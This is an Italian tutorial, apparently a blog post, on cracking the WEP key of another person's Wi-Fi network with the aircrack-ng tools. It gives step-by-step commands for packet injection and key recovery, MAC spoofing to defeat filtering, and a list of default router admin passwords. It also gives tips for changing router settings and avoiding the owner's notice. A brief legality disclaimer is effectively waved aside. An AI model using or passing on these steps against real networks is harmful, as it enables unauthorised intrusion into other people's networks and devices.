La seguente guida è fornita a scopo conoscitivo.
E’ illegale ottenere la password e accedere ad una rete altrui senza il consenso del proprietario.
Ognuno poi faccia il meglio che crede…
Come
ottenere una chiave wep
NECESSARIO
-
la
buona rete
–
La rete wireless deve essere criptata con una chiave WEP
statica (per capirlo prima di avventurarsi, è sufficiente voler
connettersi, a quel punto verrà chiesta la password specificando se
si tratta di WEP o WPA/PSK).
–
La rete non deve essere troppo lontana. Il limite della ricezione
è attorno al 10% (fare attenzione al fatto che si tratta di un
valore relativo al s.o., al driver, etc). Naturalmente una maggior
ricezione velocizza la procedura. In metri corrisponde ad
un’ottantina massimo senza ostacoli e trenta circa attraverso muri.
-
Il
buon materiale– una buona carta wireless.
Ciò significa che la carta deve essere patchabile per l’iniezione
di pacchetti (informarsi prima di procurarsela; normalmente i
chipset Atheros lo sono, tenere conto dei driver utilizzati,
ad esempio, per i ath5k non è necessaria la patch, poiché già
predisposti all’iniezione). Fare attenzione non alla marca (per es.
netgear), ma al chipset (per es. atheros).– un’antenna. Secondo
la ricezione può essere più o meno indispensabile. Per i pc
portatili è praticamente impossibile autocostruirla (a meno di
smontare mezzo computer) mentre per le schede che dispongono
dell’uscita connettore N ci sono molte guide disponibili sulla rete
(http://wireless.iport.it/creare-antenna-wifi.html,
http://www.irex.it/articolo/antenna-wifi-pringles.html
,http://www.napoliwireless.net/doku/doku.php). -
Il
buon software– Purchè, a quanto pare, sia
possibile utilizzare Windows è vivamente consigliato GNU/Linux.
Va bene qualsiasi distribuzione che abbia una scheda wireless
riconosciuta ed un’eventuale patch per l’iniezione (con i ath5k non
è necessaria, con Backtrack c’è già) ed abbia installato la suite
aircrack-ng.– Per semplificarsi al massimo
la vita esiste Backtrack, una distribuzione linux live
appositamente studiata per il testing delle reti in cui si trovano
già tutti gli strumenti necessari. E’ sufficiente scaricare
l’immagine .iso da www.remote-exploit.net/backtrack,
masterizzarla e lanciare il boot da cd. Ne esistono anche
altre, come nUbuntu.
POSTPRE-REQUISITI
-
Buona rete, buon materiale e
buon software, si può quasi iniziare. Immaginiamo in gran massima
di usare Backtrack. -
Da terminale
$
su
la
password da inserire è toor
questo
permetterà di agire in qualità di root (si vede nel terinale poiché
l’ultimo carattere della stringa
ordi@ordi~# è un cancelletto e non più un $)
-
#iwconfig
permette
di capire che se il sistema vede la scheda, come si chiama (e
indirettamente che driver usa).
ordi@ordi-laptop:~#
iwconfig
lo
no wireless extensions.
wmaster0
no wireless extensions.
wlan0
IEEE 802.11bg ESSID:""
Mode:Managed
Frequency:2.437 GHz Access Point: 00:1D:6A:A8:08:E6
Bit
Rate=1 Mb/s Tx-Power=20 dBm
Retry
min limit:7 RTS thr:off Fragment thr=2352 B
Power
Management:off
Link
Quality=73/100 Signal level:-56 dBm Noise level=-103 dBm
Rx
invalid nwid:0 Rx invalid crypt:0 Rx invalid frag:0
Tx
excessive retries:0 Invalid misc:0 Missed beacon:0
eth0
no wireless extensions.
La
nostra scheda si chiamerà in questo caso wlan0. Se c’è scritto ath0
sarò una scheda atheros che usa i driver madwifi.
SNIFFARE
-
Il
primo passo è sniffare il traffico rete. Innanzitutto occorre che
la scheda di rete sia in mode monitor. Se si utilizzano i
driver madwifi:#wlanconfig
ath0 destroy#wlanconfig
ath0 create wlandev wifi0 wlanmode monitor -
Utilizzando
altri driver, tra cui gli ath5k per i chipset atheros, occorre dare:
#airmon-ng
start wlan0Ciò
creerà un’interfaccia virtuale mon0, che dovremo sostituire nei
prossimi comandi a ath0 -
#
airodump-ng -w test –-ivs [se vogliamo -c 11 e/o –bssid ] ath0Ho
notato che delle volte è necessario specificare il canale, poiché
altrimenti si riceve un errore nei passi successivi. -
Adocchiare
nella lista delle reti quelle WEP, le wep il cui pwr e rxq siano più
alti e con parecchi beacons. Attendere che una station si
connetta alla rete prescelta. Se nessuno dovesse connettersi: a)
aver pazienza e lasciare girare airodump, guardando di tanto in
tanto i risultati in /home/test.txt b) assicurarsi di essere
abbastanza vicini alla rete (e quindi, eventualmente perfezionare la
propria antenna) c) con backtrack2 e scheda.
SOLLECITARE PACCHETTI
-
#aireplay-ng
-1 0 -e NOMERETE -h NO:ST:RO:MA:CC [-a BSSID] ath0 -
Se
tutto va bene, l’output del comando dovrebbe felicitarsi per
l’avvenuta autentificazione con un 🙂 -
Se
dovessero invece esserci problemi
prestare
attenzione al fatto che potrebbe esserci un filtraggio di
indirizzi mac
Nel
caso, occorre cambiare il nostro indirizzo e sostituirlo con
quello presente nella colonna station di airodump-ng (in termini
tecnici: mac-spoofing). Per far ciò, appuntato l’indirizzo, occorre
seguire tale procedura se si hanno driver madwifi:
#
wlanconfig ath0 destroy
# ip link set dev wifi0 down
#
macchanger -m IN:DI:RI:ZZ:OM:AC wifi0
# ip link set dev wifi0 up
#
wlanconfig ath0 create wlandev wifi0 wlanmode monitor
oppure
quest’altra se si posseggono i ath5k:
# ip link set wlan0 down # macchanger -r wlan0 # sudo ip link set dev wlan0 up c'è da dire che la procedura con i driver ath5k sembra essere sperimentale: il cambio avviene felicemente, ma il dhclient non riesce ad acquisire l'indirizzo ip (i problemi quindi sono dopo, una volta ottenuta la pwd). Patchando debitamente il kernel si dovrebbe riuscire. Più info su https://kerneltrap.org/mailarchive/linux-ath5k-devel/2008/11/21/4197334/thread
CAPTARE PACCHETTI
-
Se
l’autentificazione è riuscita, è ora di captare i pacchetti:#
aireplay-ng -3 -b BSSID -h MI:OA:DR:ES:MA:C mon0
Con questo vedremo i pacchetti
sfilare. In media sono necessari 200.000 pacchetti, una volta
raggiunti si può passare al passaggio seguente. Nei casi più
fortunati potrebbero essere sufficienti 40000 pacchetti circa (anche
se ciò avviene assai di rado)
DECRIPTARE LA KEY
-
#aircrack-ng
-z test*.ivs -b BSSID -
Con
un po’ di fortuna l’output sarà qualcosa di simile:
Aircrack-ng 1.0 rc3
[00:00:00] Tested 641 keys (got
204749 IVs)
KB
depth byte(vote)
0
0/ 1 33(295936) 16(230144) 30(227584) 2A(222464) 19(221696)
1
32/ 1 84(212736) E5(212480) 81(212224) 89(212224) 0B(211968)
2
3/ 9 F1(224768) 6E(223744) AA(222208) 53(221696) 9D(220672)
3
1/ 3 7D(234240) 45(229120) FE(223744) 68(222720) E9(222464)
4
1/ 4 3D(224768) 92(221952) E7(219136) 15(218880) 8A(218880)
KEY
FOUND! [
33:35:47:51:37:35:56:47:56:48:47:45:32 ] (ASCII: 35GQ75VGVHGE2 )
Decrypted
correctly: 100%
POST DECRIPTAGGIO
-
A
questo punto, PRIMA di inserire la chiave quando è richiesta è
opportuno prestare attenzione a qualche precauzione. -
Se
fin’ora è stato immaginato di utilizzare una live apposita per il
testing delle reti, d’ora in poi si immaginerà di usare il sistema
operativo quotidiano, supponendo che questo sia la distro
Ubuntu. -
Se
c’era un filtraggio mac, perché la connessione vada a buon fine
occorre seguire la procedura per assumere in qualità di
fake-address quello del client connesso. -
Se
anche non ci fosse un filtro, è buona norma per la propria privacy
di cambiare il proprio mac, attraverso il comando macchanger
-r wlan0 che
imposterà un mac casuale per la nostra scheda. Volendo è possibile
creare un piccolo script.
Per creare lo script
(su una distro Ubuntu):
-
$
sudo gedit ~/connetti -
nella
pagina che si presenta incollare:
sudo
ip link set wlan0 down
sudo macchanger -r wlan0 sudo ip link set wlan0 up sudo /etc/init.d/networking restart sudo iwconfig wlan0 rate 1M sudo iwconfig wlan0 essid NOMERETE channel 11 sudo dhclient wlan0
-
Modificare
secondo i propri parametri e salvare. -
Da
terminale:$
sudo chmod a+x ~/connettiper
rendere lo script eseguibile -
Aggiungere
lo script a Sistema>Applicazioni d’avvio
-
Connessi alla rete, è
possibile modificare qualche parametro sul router (aprire porte,
disattivare filtro ip, etc).
-
Questi
sono gli indirizzi
IP
più comuni dei router:192.168.0.1
192.168.1.1
10.0.0.1
10.0.1.1
-
Ecco, invece,alcune delle
password di default per accedere ai router più diffusi:
-
Linksys
Wireless-G VPN Broadband Router
(http://www.linksys.com/products/product.asp?grid=33&scid=35&prid=565
)Default
Login:admin/admin
Default
SSID:linksys-g
-
Netgear
WGR614
e MR814
Cable/DSL
Wireless Router 54 Mbps/2.4 Ghz
(http://www.netgear.com/products/prod_details.php?prodID=151&view=
)Default
Login:admin/password
Default
SSID:
NETGEAR
-
Microsoft
MN-700 802.11g
(http://www.microsoft.com/hardware/broadbandnetworking/productdetails.aspx?pid=002
)
Default
Login:admin
Default
SSID:MSNHOME
-
D-Link
DI-624
AirPlus XtremeG Access Point
(http://www.dlink.com/products/?model=DI-624
)Default
Login:admin/admin
Qui
ce ne sono molte di più http://www.routerpasswords.com/
e anche qua:
https://www.securinfos.info/passwords-liste-mots-de-passe.html
e qua http://www.phenoelit-us.org/dpl/dpl.html
-
Se le password dovessero
essere state modificate è il caso di prestare attenzione: il
possessore della rete non è un utonto di base, ma ha un pochino più
a cuore la sua sicurezza (in realtà in questo caso è assai
improbabile che abbia una chiave wep, ma vai a sapere!). -
Se
non ci si riesce a connettere potrebbe essere un problema di dhcp:
il router non l’ha attivato. E’ preferibile connettersi tramite un
ip fisso piuttosto che attivarlo (l’utente potrebbe accorgersi che
qualcosa non va). -
Se
la password risulta errata può essere che la rete utilizzi un
criptaggio a
wep dinamica,
in quel caso è meglio cambiare rete.
3